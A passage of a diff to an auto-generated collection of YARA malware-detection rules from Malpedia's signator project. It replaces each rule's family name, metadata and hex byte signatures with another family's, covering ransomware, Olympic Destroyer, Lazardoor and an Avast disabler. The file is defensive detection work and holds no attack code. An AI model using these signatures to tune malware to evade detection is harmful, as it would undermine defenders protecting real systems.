-		$sequence_0 = { 41b8fe010000 6689bdf0020000 e8???????? 488d8df2040000 }
-		$sequence_1 = { 33c0 488d4c2422 33d2 41b8fe010000 }
-		$sequence_2 = { 458d4103 ba00000080 c744242880000000 4c89ac2498040000 }
-		$sequence_3 = { 03df 3bde 72ad 488b5c2448 488b7c2420 b801000000 4883c428 }
-		$sequence_4 = { ffca 750d 4d85c0 7408 498bc8 e8???????? }
-		$sequence_5 = { 40387598 e9???????? 48895c2408 4889742410 48897c2418 }
-		$sequence_6 = { 48897c2420 895c2440 895c2450 85d2 745e 6666660f1f840000000000 }
-		$sequence_7 = { e8???????? eb40 4c8d2569be0000 488b0d???????? e9???????? 4c8d2566be0000 }
-		$sequence_8 = { e8???????? 488d8de2000000 33d2 41b806020000 6689bde0000000 }
-		$sequence_9 = { 7528 48833d????????00 741e 488d0db1f40000 }
+		$sequence_0 = { 51 56 8d45fc 8bf1 50 e8???????? 85c0 }
+		$sequence_1 = { 8b7508 ba04010000 2bf1 6690 }
+		$sequence_2 = { 84c0 7415 8801 41 83ea01 }
+		$sequence_3 = { 5e 8be5 5d c20400 85c9 7506 48 }
+		$sequence_4 = { 8a1c06 84db 741c 8818 4a 40 83e901 }
+		$sequence_5 = { 0f1f440000 3811 7408 41 83e801 75f6 eb04 }
+		$sequence_6 = { 41 83ea01 75e7 8851ff b87a000780 5e }
+		$sequence_7 = { 75ec 48 bf7a000780 8808 8bc7 5f 5b }
+		$sequence_8 = { 85d2 7417 0fb73407 6685f6 740e }
+		$sequence_9 = { d3c8 3305???????? 3905???????? 0f8594070000 }
+		$sequence_10 = { 83e13f c1f806 6bc930 8b048508414100 }
+		$sequence_11 = { 8b30 8bd6 c1fa06 8bc6 83e03f 6bc830 8b049508414100 }
+		$sequence_12 = { eb57 53 8b1c85e8dd4000 56 6800080000 6a00 53 }
+		$sequence_13 = { b802000000 833d????????00 0f85b00a0000 8d0d60104100 }
+		$sequence_14 = { 8b0c8d08414100 c644112800 85f6 740c 56 }
 
 	condition:
-		7 of them and filesize < 190464
+		7 of them and filesize < 270336
 }
-rule MALPEDIA_Win_Cuba_Auto : FILE
+rule MALPEDIA_Win_Salgorea_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "86d7ccf5-17e2-58df-93e2-25197c1f8e94"
+		id = "24c723a2-add3-5c98-ac68-d74df04ec748"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuba"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cuba_auto.yar#L1-L160"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.salgorea"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.salgorea_auto.yar#L1-L164"
 		license_url = "N/A"
-		logic_hash = "06e63a9dd7221f555e50b6728a34cba72d1d2d067337f699676a2804a6a34058"
+		logic_hash = "269f1f65813d46929a9206777195f8973f6aec01fe1e29b4790465e302c7f726"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95123,40 +95319,40 @@ rule MALPEDIA_Win_Cuba_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 7810 3de4000000 7309 8b04c510704100 5d }
-		$sequence_1 = { c3 8bff 55 8bec 8b4d08 33c0 3b0cc5905d4100 }
-		$sequence_2 = { 0019 43 41 00444341 }
-		$sequence_3 = { 8bd6 c745ac749f4100 8bce 0fb707 }
-		$sequence_4 = { 000d???????? 384100 b538 41 }
-		$sequence_5 = { 0026 45 41 003a }
-		$sequence_6 = { 0026 43 41 00b043410062 }
-		$sequence_7 = { 0012 45 41 0026 }
-		$sequence_8 = { 83e801 0f8501010000 c745e004934100 8b4508 }
-		$sequence_9 = { ff24953c354000 c7878c00000001000000 85c9 747e 3bc6 730a }
-		$sequence_10 = { 660fc5c400 25f0070000 660f28a040974100 660f28b830934100 660f54f0 660f5cc6 660f59f4 }
-		$sequence_11 = { ffd7 85c0 750c e8???????? 5f }
-		$sequence_12 = { 000c43 41 0035???????? 43 }
-		$sequence_13 = { 003a 45 41 004245 }
-		$sequence_14 = { 7414 8d85c0f9ffff 50 56 ff15???????? 85c0 75e6 }
-		$sequence_15 = { 000446 41 00d1 45 }
+		$sequence_0 = { 893424 57 a1???????? 33c5 50 }
+		$sequence_1 = { 81e1ab000000 8b4c2414 f7d3 8b5c2418 53 9d }
+		$sequence_2 = { 66b9ad00 66f7e1 2bcb 80ef1f 59 }
+		$sequence_3 = { e8???????? 8b4510 2bfb 3bc7 0f8302000000 8bf8 3bf1 }
+		$sequence_4 = { 53 52 8d9c10f47e0000 6699 66c1e303 f6d1 }
+		$sequence_5 = { 8d6424fc 8d6424d0 9c 51 f6d1 9c }
+		$sequence_6 = { 80e6ee f8 f6d1 52 40 f7d3 8b5c2404 }
+		$sequence_7 = { 41 6681c1db00 8b4c2410 66c1e804 8b44240c }
+		$sequence_8 = { a1???????? 8945cc 8d45cc 3930 }
+		$sequence_9 = { 8d943a9979825a 8b7df4 c1c61e 33fe }
+		$sequence_10 = { 8d9432dcbc1b8f 8b75fc 0b75f8 8b7dfc }
+		$sequence_11 = { 8d943a9979825a 8b7df0 337dfc 8bf2 }
+		$sequence_12 = { 8d942498030000 89542428 8b531c 894c2434 }
+		$sequence_13 = { 8d942490000000 e8???????? 8b03 ff7030 }
+		$sequence_14 = { 8d9432a1ebd96e 8b75e0 3375cc 8955ec }
+		$sequence_15 = { 8d942490000000 e8???????? 85c0 7403 83cfff 8bc7 85ff }
 
 	condition:
-		7 of them and filesize < 1094656
+		7 of them and filesize < 2007040
 }
-rule MALPEDIA_Win_Spectre_Auto : FILE
+rule MALPEDIA_Win_Olympic_Destroyer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ab060ee1-08ad-588e-8d49-1ae94553e1b3"
+		id = "4acd0027-92fe-500e-bf15-82d11cf7dd70"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spectre"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.spectre_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.olympic_destroyer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.olympic_destroyer_auto.yar#L1-L227"
 		license_url = "N/A"
-		logic_hash = "84c50bd871d13f0a4f1a8853e9cdfc23094379080d0055ac204b2f23d3a74297"
+		logic_hash = "04c4fa0edf97b10dccc92d5a353a5a44b42a7347836f6e32d55d1c64914c31af"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -95168,32 +95364,45 @@ rule MALPEDIA_Win_Spectre_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bce 50 ff750c ff7508 e8???????? 8d4de4 e8???????? }
-		$sequence_1 = { 6bc938 53 56 8b048538324700 8b7508 57 8bfe }
-		$sequence_2 = { 8d4d20 e8???????? 8b4dfc 33cd 5e e8???????? c9 }
-		$sequence_3 = { 50 e8???????? 8b8424b4000000 83c434 8b4c247c 2bc1 83e830 }
-		$sequence_4 = { c605????????01 e8???????? eb0c 881d???????? 881d???????? 8b442448 bb00100000 }
-		$sequence_5 = { 8bcf 89442420 e8???????? 89442410 8bc3 2b442414 6a18 }
-		$sequence_6 = { 6a01 be???????? 8d8de4feffff 56 e8???????? 8d454c 50 }
-		$sequence_7 = { 8b4e0c b8ffffff7f 2bc1 3bc3 7279 83651000 8d4510 }
-		$sequence_8 = { 8d8c24fc010000 e8???????? 8d8424f8010000 50 8d842454010000 68???????? 50 }
-		$sequence_9 = { e8???????? 8b44242c 83c40c 0430 89442420 8b44245c 8b542420 }
+		$sequence_0 = { 56 33c0 89542414 57 }
+		$sequence_1 = { 85c0 7453 8b44242c 8d4c2410 }
+		$sequence_2 = { ffd7 85c0 0f848c000000 68???????? 8d85c0f9ffff 50 }
+		$sequence_3 = { 8985d4f7ffff 8d8580f7ffff 56 50 89b5d8f7ffff }
+		$sequence_4 = { 51 8bce 8b4004 894510 e8???????? 8b4d10 }
+		$sequence_5 = { 51 8bcf 89442424 e8???????? 8b542424 }
+		$sequence_6 = { 51 8bcb 8975c4 e8???????? 83c404 8945e4 }
+		$sequence_7 = { 83e801 743e 83e805 756d 50 50 8b4104 }
+		$sequence_8 = { 8945fc 53 56 8d45e8 33f6 50 8975e8 }
+		$sequence_9 = { ff15???????? 85c0 0f88ac000000 6a00 }
+		$sequence_10 = { 51 8bce 8d52ff e8???????? 83c408 85c0 0f851f040000 }
+		$sequence_11 = { 51 8bce 8944244c 89bc2480000000 }
+		$sequence_12 = { 3bc6 742a 0185f0efffff 8b85ecefffff }
+		$sequence_13 = { a4 4a 40 00d0 4a 40 }
+		$sequence_14 = { ff74241c ff15???????? 5f 33c0 5e 40 5b }
+		$sequence_15 = { 0f8794020000 ff2485bc4b5500 51 8d542454 e8???????? 83c404 85c0 }
+		$sequence_16 = { 8b6c2424 55 6a40 ff15???????? 89442418 85c0 }
+		$sequence_17 = { 51 8bcb e8???????? 8a45dc }
+		$sequence_18 = { 89442414 e8???????? 85c0 7415 8d4e08 }
+		$sequence_19 = { 89442430 8b442444 89442434 751f }
+		$sequence_20 = { 51 8bce e8???????? 6a00 68???????? }
+		$sequence_21 = { 50 ffd7 85c0 747a ffb590f9ffff e8???????? eb5f }
+		$sequence_22 = { 56 ff15???????? 6880ee3600 ff15???????? }
 
 	condition:
-		7 of them and filesize < 990208
+		7 of them and filesize < 1392640
 }
-rule MALPEDIA_Win_Apocalypse_Ransom_Auto : FILE
+rule MALPEDIA_Win_Lazardoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b5a0679d-3efc-5c9d-b682-041d8a2aacea"
+		id = "aeee5fb7-3124-5412-93e2-d397e0b6b5aa"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalypse_ransom"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.apocalypse_ransom_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazardoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lazardoor_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "8cee33b1e4eac4c1405375639b552a991305017c9df19464c32f3823d3e5b8e7"
+		logic_hash = "6155f61e925d37cd5ef1d71aad2d5b29beaeb971eaf97c299374ef05d14474a1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95207,32 +95416,32 @@ rule MALPEDIA_Win_Apocalypse_Ransom_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6800010000 6a00 6a00 6a00 8d4c2424 51 6880000000 }
-		$sequence_1 = { 8d4c2414 51 ffd7 03c0 50 8b442414 }
-		$sequence_2 = { 8bc3 e8???????? 6a04 6800100000 68ff7f0000 6a00 }
-		$sequence_3 = { 8b2d???????? 52 ffd5 8d442410 }
-		$sequence_4 = { ff15???????? 6a03 56 ff15???????? 56 ff15???????? 5f }
-		$sequence_5 = { 51 68???????? 6801000080 ffd6 8b3d???????? 8d542414 52 }
-		$sequence_6 = { 8d542444 52 56 68???????? 8d842474020000 50 eb13 }
-		$sequence_7 = { 6a00 6880000000 6a03 6a00 6a01 6800000080 8d4c2440 }
-		$sequence_8 = { 6801000080 ffd6 8b3d???????? 8d542414 52 ffd7 8b4c2410 }
-		$sequence_9 = { 743b 56 68???????? ffd5 83c408 6a00 6a00 }
+		$sequence_0 = { 4883c024 8938 e8???????? 488d1d23ce0100 }
+		$sequence_1 = { e8???????? ba50540000 488b0d???????? 4533c9 4533c0 ff15???????? }
+		$sequence_2 = { 4803cf e8???????? 488b0e 41ffc6 4883c328 }
+		$sequence_3 = { 4889442420 498bd4 ff15???????? 85c0 7506 ff15???????? 4533f6 }
+		$sequence_4 = { 4c8bb424d0010000 488b8dc0000000 4833cc e8???????? 4881c4e8010000 415f 415d }
+		$sequence_5 = { 488d45e8 48894de8 488945f0 488d155cde0000 }
+		$sequence_6 = { 83c8ff f00fc103 83f801 7516 488d05a6470100 488b4c2430 483bc8 }
+		$sequence_7 = { 7873 3b1d???????? 736b 488bc3 488bf3 48c1fe06 4c8d2dbe0f0100 }
+		$sequence_8 = { 488d1517c4feff c1e803 89442450 8bc8 89442448 }
+		$sequence_9 = { 488d15c2a20200 488bce ff15???????? 85c0 0f84f3000000 48c7c7ffffffff 488bc7 }
 
 	condition:
-		7 of them and filesize < 40960
+		7 of them and filesize < 405504
 }
-rule MALPEDIA_Win_Akdoortea_Auto : FILE
+rule MALPEDIA_Win_Freenki_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "273d2f0d-acc7-5ac9-9a11-3e8564a6c5a7"
+		id = "67ab05f0-0092-5ff4-bb96-cc24a6a94dbc"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.akdoortea"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.akdoortea_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.freenki"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.freenki_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "2fa5ad11741a8504cc8c2573ed395ff2e4f2dd319c182aa1bdba253b5a1bde31"
+		logic_hash = "a02a6867fe9e948b2e235fe875697f9d977ad7f0e52b8303d46cef856d876490"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95246,32 +95455,32 @@ rule MALPEDIA_Win_Akdoortea_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 006118 40 007019 40 00411a }
-		$sequence_1 = { 7641 8d85f0feffff 8d5001 0f1f8000000000 8a08 }
-		$sequence_2 = { 8d8df0f9ffff 8d5002 e8???????? 8bf0 83c420 85f6 }
-		$sequence_3 = { 8bec 83ec0c 53 8bda 56 8bf1 57 }
-		$sequence_4 = { 50 8b04bdf8204200 ff741818 ff15???????? 85c0 0f95c0 eb02 }
-		$sequence_5 = { 7439 8d56ff 8a4201 8d5201 84c0 75f6 }
-		$sequence_6 = { 90 85f6 740b 83feff 0f859a000000 eb6c 8b1c8d10a24100 }
-		$sequence_7 = { e8???????? 83c414 ebe1 8b55ec 8b4de8 8b0495f8204200 807c082800 }
-		$sequence_8 = { 83c418 c745f803010000 8d45f8 50 8d4304 50 ff15???????? }
-		$sequence_9 = { ffd6 68f4010000 8bf0 ff15???????? 85ff 740e }
+		$sequence_0 = { ff75e4 ff15???????? 85c0 7920 8b45e4 50 8b08 }
+		$sequence_1 = { 89b5e4edffff 33c0 c785c0edffff00000000 50 51 8d8dccedffff c785e0edffff07000000 }
+		$sequence_2 = { 56 e8???????? 8b8d60ffffff 8bf8 8b45f0 83c404 8930 }
+		$sequence_3 = { 8bf8 83c404 85ff 0f84e4000000 6804010000 57 }
+		$sequence_4 = { 51 8d4dc0 c745e400000000 e8???????? c745fc00000000 }
+		$sequence_5 = { 0fb78194f74100 8d4902 6689840deafbffff 6685c0 75e9 56 }
+		$sequence_6 = { c745c000000000 c745c400000000 c745c800000000 ff15???????? 898554ffffff 57 85c0 }
+		$sequence_7 = { 0bc8 51 53 e8???????? 8bd8 83c408 85db }
+		$sequence_8 = { c3 56 57 53 ff75f4 ff75f8 }
+		$sequence_9 = { 83c202 6685c0 75f5 2bd1 8d8df8deffff d1fa 03d2 }
 
 	condition:
-		7 of them and filesize < 305152
+		7 of them and filesize < 327680
 }
-rule MALPEDIA_Win_Rover_Auto : FILE
+rule MALPEDIA_Win_Avast_Disabler_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "451be843-c1b6-533c-b0b3-7d3bb00747ec"
+		id = "645a106b-f735-50ef-a098-7cdfe936ba27"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rover"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rover_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avast_disabler"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.avast_disabler_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "31c11b80e1502485f7e7215f291e9c4bbf44558d14836234edb24070e18bf1ca"
+		logic_hash = "d9bf9a929cf2cb5bcebd034c783b915e751fc8d18f9e66457ed913ca7fa968a1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95285,32 +95494,32 @@ rule MALPEDIA_Win_Rover_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7478 8b4c2474 8d442434 50 68ff3f0000 8d83f4050000 50 }
-		$sequence_1 = { eb03 83c604 56 ff15???????? 33c9 83c404 84c0 }
-		$sequence_2 = { 8b0d???????? 50 51 6a02 6a1c 8d9424dc000000 52 }
-		$sequence_3 = { 8b5b10 8b44241c 8d4bfc 3bc1 745c 8928 83c004 }
-		$sequence_4 = { eb6a 80bc241d01000000 7409 51 ff15???????? eb57 80bc241e01000000 }
-		$sequence_5 = { 85c0 740c 8b0d???????? 8b5140 50 ffd2 8d442428 }
-		$sequence_6 = { 83beb000000000 0f846d030000 83bb5802000000 742c 83bb4087000000 7523 8b8e94000000 }
-		$sequence_7 = { 33ff 837d3805 89442410 894c2414 897c240c 750e 8bc6 }
-		$sequence_8 = { 897c2424 83ffff 0f84e8060000 8b2d???????? }
-		$sequence_9 = { ff25???????? 8d8d48ffffff ff25???????? 8b542408 8d8230ffffff 8b8a2cffffff 33c8 }
+		$sequence_0 = { 50 8d85f0feffff 50 e8???????? 8b4c371c }
+		$sequence_1 = { c20c00 3b0d???????? 7503 c20000 e9???????? 8bff }
+		$sequence_2 = { e8???????? 8b4c371c 8d85f0feffff 2b4c3718 }
+		$sequence_3 = { 8bf0 85f6 7815 8d45f8 50 e8???????? 8bf0 }
+		$sequence_4 = { 41 83ef01 75f1 8b85ecfeffff 33c9 0fb7d0 33c0 }
+		$sequence_5 = { 57 8945e4 33ff 8d45dc }
+		$sequence_6 = { 8bf0 85f6 7826 6a04 59 }
+		$sequence_7 = { 6a00 ff7508 8bf0 57 }
+		$sequence_8 = { 6bf80e 668b450c 6639443712 7408 }
+		$sequence_9 = { 6a00 ff7508 8bf0 57 e8???????? }
 
 	condition:
-		7 of them and filesize < 704512
+		7 of them and filesize < 41984
 }
-rule MALPEDIA_Win_Hacksfase_Auto : FILE
+rule MALPEDIA_Win_Broler_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "729ac06e-5cdf-534d-872e-f45399aff424"
+		id = "1cf91de0-5126-5e8f-b11c-1d3db3402e61"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hacksfase"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hacksfase_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.broler"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.broler_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "475d936eb0e74e3fe48740a165f50322f1d0bfb51d9d93ce37cd5fe8ac260ab9"
+		logic_hash = "fcd117231e6be08bdf633689556086666ed79e35ac782c6838a07603ffb215e5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95324,32 +95533,32 @@ rule MALPEDIA_Win_Hacksfase_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8965e8 33db 895de0 895de4 895dd8 895ddc 895dfc }
-		$sequence_1 = { 56 6a02 68???????? 56 ff500c }
-		$sequence_2 = { 56 ffd3 50 ffd5 56 ff15???????? }
-		$sequence_3 = { 89442418 894c241c 6a00 6a00 6a00 6a06 6a01 }
-		$sequence_4 = { 3975b4 7416 3975bc 7411 ff75b4 8bcb }
-		$sequence_5 = { 7479 bf02000000 8b442414 40 3bc7 89442414 }
-		$sequence_6 = { e8???????? 8b1d???????? 83c40c 68e8030000 ffd3 6a00 6a00 }
-		$sequence_7 = { 895dc8 895dd0 ff5064 3bc3 894508 7d5d }
-		$sequence_8 = { b8???????? e8???????? 83ec0c 8b412c 56 57 }
-		$sequence_9 = { 33d2 8d0cb6 f7f6 8d0c89 }
+		$sequence_0 = { 51 6a01 53 ff15???????? 8bf0 ff15???????? 3bf3 }
+		$sequence_1 = { 68e9fd0000 ff15???????? 8bc6 c6043e00 8d5001 }
+		$sequence_2 = { c785c0feffff0f000000 899dbcfeffff 889dacfeffff 39b5a4feffff }
+		$sequence_3 = { 8bf0 8d45d4 3bc6 7461 837de810 720c 8b4dd4 }
+		$sequence_4 = { 57 8d8da8feffff e8???????? 83c408 33c0 8a4c05f0 8888f8cd4100 }
+		$sequence_5 = { 8b3d???????? 53 ffd7 56 ffd7 8d8d70fdffff }
+		$sequence_6 = { b8???????? 8db554ffffff c78568ffffff0f000000 e8???????? 8d8570ffffff }
+		$sequence_7 = { 8bdf c1fb18 c1f818 81e3ff000000 3283085a4100 8b5d0c }
+		$sequence_8 = { 3299085a4100 c1fe08 81e6ff000000 8bca c1f908 88580d }
+		$sequence_9 = { 83fb10 7305 8d5508 8bca 2bc6 83e819 50 }
 
 	condition:
-		7 of them and filesize < 106496
+		7 of them and filesize < 275456
 }
-rule MALPEDIA_Win_Chewbacca_Auto : FILE
+rule MALPEDIA_Win_Usbferry_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "847304aa-d95d-5b53-bfb8-fe0eb8b688d2"
+		id = "099a1369-e001-5f55-b4f6-6858d99ec27a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chewbacca"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.chewbacca_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.usbferry"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.usbferry_auto.yar#L1-L163"
 		license_url = "N/A"
-		logic_hash = "f5f29df4947aa2192c20ef975dcc6c403a1b166aed455b80e47ce170d12533bf"
+		logic_hash = "a271aa110aa02149e584931e66f43eb3286c2529fb4319139aeea9b3438deb58"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95363,32 +95572,38 @@ rule MALPEDIA_Win_Chewbacca_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? b909000000 89ee 8b7c2430 f3a6 0f8558010000 89c6 }
-		$sequence_1 = { e8???????? c7442414c4796800 c7442410cd846800 c744240c1c070000 89442408 c7442404???????? a1???????? }
-		$sequence_2 = { 8b4324 85c0 7461 c744240c00000000 8d54242c 89542408 c744240400000000 }
-		$sequence_3 = { e9???????? 8b45fc e8???????? 52 50 8d45b8 e8???????? }
-		$sequence_4 = { e8???????? c744241cd4686500 c7442418a0836500 c74424147b110000 89442410 c744240c44446500 c7442408???????? }
-		$sequence_5 = { e8???????? c7042401000000 e8???????? e8???????? 89c3 e8???????? 895c2410 }
-		$sequence_6 = { e8???????? e8???????? 50 85c0 0f8540040000 b801000000 8d5584 }
-		$sequence_7 = { e8???????? c744241c84006700 c7442418b7026700 c7442414eb010000 89442410 c744240c64fd6600 c7442408???????? }
-		$sequence_8 = { e8???????? e8???????? 50 85c0 7516 8d55d4 89d8 }
-		$sequence_9 = { e8???????? c7442414cb246800 c7442410f3296800 c744240cec040000 89442408 c7442404???????? a1???????? }
+		$sequence_0 = { 3c4c 750c 0fbec0 42 89442428 }
+		$sequence_1 = { 83c40c c785b0f7ffff44000000 c785dcf7ffff01000000 33d2 }
+		$sequence_2 = { ff5018 8bf0 83feff 7504 }
+		$sequence_3 = { 33c5 8945fc c645f463 c645f56d }
+		$sequence_4 = { 8b15???????? 8bcb ff7210 898214010000 }
+		$sequence_5 = { 88441de0 8a0439 88441de1 83c302 }
+		$sequence_6 = { 83c40c 8d85c4e9ffff 50 a1???????? ff90a4000000 }
+		$sequence_7 = { e8???????? 8b459c 807b0c67 750c 85c0 }
+		$sequence_8 = { 8981c8000000 8b09 e8???????? 8b0d???????? }
+		$sequence_9 = { 8b45cc e9???????? 8b55e0 52 ff15???????? 837d1401 0f8583000000 }
+		$sequence_10 = { 50 e8???????? 83c40c 8b4d08 51 8d55f4 }
+		$sequence_11 = { 7547 6a04 8d4d1c 51 8b5514 52 }
+		$sequence_12 = { 50 8d8db0f7ffff 51 6a00 6a00 6800000008 6a00 }
+		$sequence_13 = { c645b45c c645b54d c645b669 c645b763 }
+		$sequence_14 = { 83c009 eb4d 84db 0f94c0 83c00b eb43 }
+		$sequence_15 = { c3 3b0d???????? f27502 f2c3 f2e960030000 55 }
 
 	condition:
-		7 of them and filesize < 9764864
+		7 of them and filesize < 638976
 }
-rule MALPEDIA_Win_Ployx_Auto : FILE
+rule MALPEDIA_Win_Donex_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "61ab771e-15a5-5bf0-85c3-97759fe60e6e"
+		id = "a59c3405-5607-5fba-8e4b-94db509c7ebd"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ployx"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ployx_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.donex"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.donex_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "cb7aed624d5d0c844199f7121f6160ab6100f3d910b00c22bede0a77fbaeb62d"
+		logic_hash = "34b4db6a7ff26120108a4a0b63d1aeaf3b7a5f8d055f37299085290aeaa32538"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95402,32 +95617,32 @@ rule MALPEDIA_Win_Ployx_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d85a4feffff 68???????? 50 e8???????? 8d85a4feffff 68???????? 50 }
-		$sequence_1 = { 81f9???????? 7ce7 5b 8bc6 5f 5e c20400 }
-		$sequence_2 = { 83c418 8945f4 85c0 746f 50 e8???????? 50 }
-		$sequence_3 = { e8???????? 8bf8 8b4d08 47 47 8d0437 50 }
-		$sequence_4 = { 0f8584000000 8d45d4 50 e8???????? }
-		$sequence_5 = { 03c1 99 f7f9 8bf2 83c608 85f6 7e42 }
-		$sequence_6 = { 33ff 99 59 f7f9 8bc2 03c1 99 }
-		$sequence_7 = { aa 53 8d442414 50 ff15???????? 8d442410 68???????? }
-		$sequence_8 = { 880c30 40 0fb64dfc 8a89d8302700 880c30 40 0fb6ca }
-		$sequence_9 = { 83c42c 0005???????? bd???????? bb04010000 55 53 }
+		$sequence_0 = { 8b55c8 33f6 8bf8 0facd012 c1e70e 0bf0 c1ea12 }
+		$sequence_1 = { 55 8bec 8b4508 53 bb01000000 85c0 7503 }
+		$sequence_2 = { 894d18 c744b30400000000 3bce 72ae 8b4508 c1e602 56 }
+		$sequence_3 = { 33c8 8b45f4 c1e808 0fb6c0 c1e108 0fb680488d4300 33c8 }
+		$sequence_4 = { 03c2 894db0 8bd0 8945f4 c1cf02 8bcf c1c205 }
+		$sequence_5 = { 8b5508 8b7a0c 8b7210 8b4a08 8b5214 }
+		$sequence_6 = { 85ff 0f85d4030000 8b7de8 8d45c8 50 57 }
+		$sequence_7 = { 33c9 83c408 668908 8b45ec 83f803 7405 83f804 }
+		$sequence_8 = { c1e902 f3a5 8bca 83e103 f3a4 8b7df8 4f }
+		$sequence_9 = { 740f 83fe09 740a 83fe0d 7405 83fe0a 751a }
 
 	condition:
-		7 of them and filesize < 229376
+		7 of them and filesize < 505856
 }
-rule MALPEDIA_Win_Clipog_Auto : FILE
+rule MALPEDIA_Win_Defray_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
